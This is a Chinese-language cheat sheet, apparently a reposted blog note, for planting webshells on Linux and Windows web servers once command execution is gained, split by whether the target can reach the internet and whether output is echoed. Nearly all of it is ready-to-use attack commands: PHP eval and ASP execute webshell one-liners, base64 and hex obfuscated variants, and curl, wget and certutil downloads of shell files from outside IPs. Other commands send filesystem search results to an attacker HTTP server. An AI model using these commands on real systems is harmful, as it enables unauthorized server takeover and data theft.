目录

Linux系统

目标出网。且命令有回显

目标出网，命令无回显

目标不出网，命令无回显

Windows系统

目标出网，命令有回显

目标出网，命令无回显

目标不出网，命令无回显

---

Linux系统

目标出网。且命令有回显

find / -name 441422.png 2>/dev/null

写入文件

echo '<?php eval($_POST[1]);?>' > /var/www/html/shell.php

远程写入

curl http://192.168.1.120/shell.txt > /var/www/html/shell.php

wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php

目标出网，命令无回显

python -m http.server 1234

curl http://43.139.181.170:1234/`find / | grep 4414222.png`

wget http://43.139.181.170:1234/`find / | grep 4414222.png`

 

编码写入文件 

echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php

echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php

目标不出网，命令无回显

find / -name 4414222.png | while read f;do sh -c 'find / -name 4414222.png' >$(dirname $f)/path.txt;done

直接写入找路径并写入文件 

find / -name 4414222.png | while read f;do sh -c "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d">$(dirname $f)/shell.php;done

find / -name 4414222.png | while read f;do sh -c "echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps">$(dirname $f)/shell.php;done

 

Windows系统

目标出网，命令有回显

dir /a/b/s D:\4414222.png

where /R D:\ 4414222.png

for /r "D:\" %i in (4414222.png*) do @echo %i

 写入文件

set /p="<%execute request("1")%>" <nul >> C:\inetpub\wwwroot\shell.asp

echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp

certutil -urlcache -split -f http://43.139.181.170:1234/shell.txt C:\inetpub\wwwroot\shell.asp

目标出网，命令无回显

python -m http.server 1234

for /r D:\ %i in (4414222.png*) do certutil -urlcache -split -f http://43.139.181.170:1234/%i

找路径并写入文件

for /r D:\ %i in (4414222.png*) do echo ^<?php @eval($_POST["aa"]);?^> > %i/../shell.php

for /f %i in ('dir /s /b D:\4414222.png') do echo ^<%execute request("1")%^> > %i/../shell.asp

目标不出网，命令无回显

for /r D:\ %i in (4414222.png*) do echo %i> %i\..\path.txt

for /f %i in ('dir /s /b D:\4414222.png') do echo %i> %i\..\path.txt

for /r D:\ %i in (4414222.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp

for /f %i in ('dir /s /b D:\4414222.png') do echo ^<%execute request("1")%^> > %i/../shell.asp

 

参考：  公众号 ”潇湘信安“  但是找不到文章链接了，有需求可以自己去翻阅。本来打算写来自己看的。所以写时就没注明转载